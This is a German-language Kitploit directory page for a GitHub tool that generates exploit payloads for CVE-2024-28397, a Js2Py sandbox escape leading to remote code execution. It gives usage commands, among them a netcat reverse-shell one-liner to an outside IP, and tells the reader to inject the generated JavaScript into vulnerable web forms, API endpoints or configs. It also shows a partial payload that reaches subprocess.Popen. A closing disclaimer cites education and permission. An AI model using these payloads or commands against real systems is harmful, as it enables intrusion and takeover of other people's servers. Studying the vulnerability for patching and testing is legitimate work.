Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2024-28397-Js2Py-RCE-Exploit — Professioneller Exploit für CVE-2024-28397: Js2Py Sandbox Escape, der zu Remote Code Execution (RCE) führt. Beinhaltet modulare Payload-Generierung. | Kitploit
Tools/GitHubGitHub/xeloxa/cve-2024-28397-js2py-rce-exploit
Payload-GenerierungSchwachstellenanalyseExploitationWebanwendungs-ExploitationPenetrationstestsRed Teaming
GitHubxeloxa/cve-2024-28397-js2py-rce-exploit

CVE-2024-28397-Js2Py-RCE-Exploit

Professioneller Exploit für CVE-2024-28397: Js2Py Sandbox Escape, der zu Remote Code Execution (RCE) führt. Beinhaltet modulare Payload-Generierung.

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen
Repository anzeigenWebseite
21vor 6 MonatenNoch nicht geprüft

Vorschau des technischen Briefings

💡 Tiefer Einblick: Klicken Sie hier, um das vollständige technische Briefing (PDF) zu lesen.

CVE-2024-28397: Js2Py Sandbox Escape Payload Generator

Python License CVE

Ein professioneller Payload-Generator für CVE-2024-28397. Dieses Tool generiert bösartigen JavaScript-Code, der dazu entwickelt wurde, die js2py-Sandbox (Versionen <= 0.74) zu umgehen und beliebige Befehle auf dem Zielsystem auszuführen.

🚨 Details zur Schwachstelle

  • CVE-ID: CVE-2024-28397
  • Betroffene Komponente: Js2Py <= 0.74
  • Auswirkung: Remote Code Execution (RCE) / Sandbox Escape
  • Mechanismus: Nutzt Object.getOwnPropertyNames, um von innerhalb der JavaScript-Umgebung auf die Python-Klasse subprocess.Popen zuzugreifen.

🚀 Verwendung

Dieses Skript generiert den exakten JavaScript-Payload, der zur Ausnutzung der Schwachstelle benötigt wird. Sie müssen js2py nicht installieren, um dieses Tool zu verwenden.

1. Einen Payload generieren

Führen Sie das Skript mit dem Befehl aus, den Sie auf dem Opferrechner ausführen möchten.

root@kitploit:~
# Generate payload to run 'id'
python3 exploit.py -c "id"
root@kitploit:~
# Generate payload for a Reverse Shell
python3 exploit.py -c "nc -e /bin/bash 10.10.10.10 4444"

2. Das Ziel angreifen

Kopieren Sie die vom Tool generierte Ausgabe und injizieren Sie sie in die angreifbare Anwendung (z. B. ein Webformular, einen API-Endpunkt oder eine Konfigurationsdatei, die von js2py geparst wird).

Beispiel für eine Injektion: Wenn eine Website Benutzereingaben entgegennimmt und mit js2py.eval_js(user_input) ausführt, wird das Einfügen des generierten Codes Ihren Befehl auf deren Server ausführen.

📝 Beispiel

root@kitploit:~
$ python3 exploit.py -c "whoami"

    var output = "Initial";
    try {
        var leaked_wrapper = Object.getOwnPropertyNames({});
        // ... (full malicious code) ...
        var res = Popen("whoami", ...).communicate();
        output = res;
    } ...
    output

👨‍💻 Autor

Ali Sünbül (xeloxa)

  • 📧 E-Mail: [email protected]
  • 🌐 Webseite: xeloxa.netlify.app
  • 🐙 GitHub: @xeloxa

⚠️ Haftungsausschluss

Diese Software wird ausschließlich zu Bildungs- und Sicherheitsforschungszwecken bereitgestellt. Der Autor übernimmt keine Verantwortung für Missbrauch dieses Codes. Stellen Sie sicher, dass Sie die ausdrückliche Erlaubnis haben, bevor Sie dies an einem System testen, das Ihnen nicht gehört.

Tool herunterladen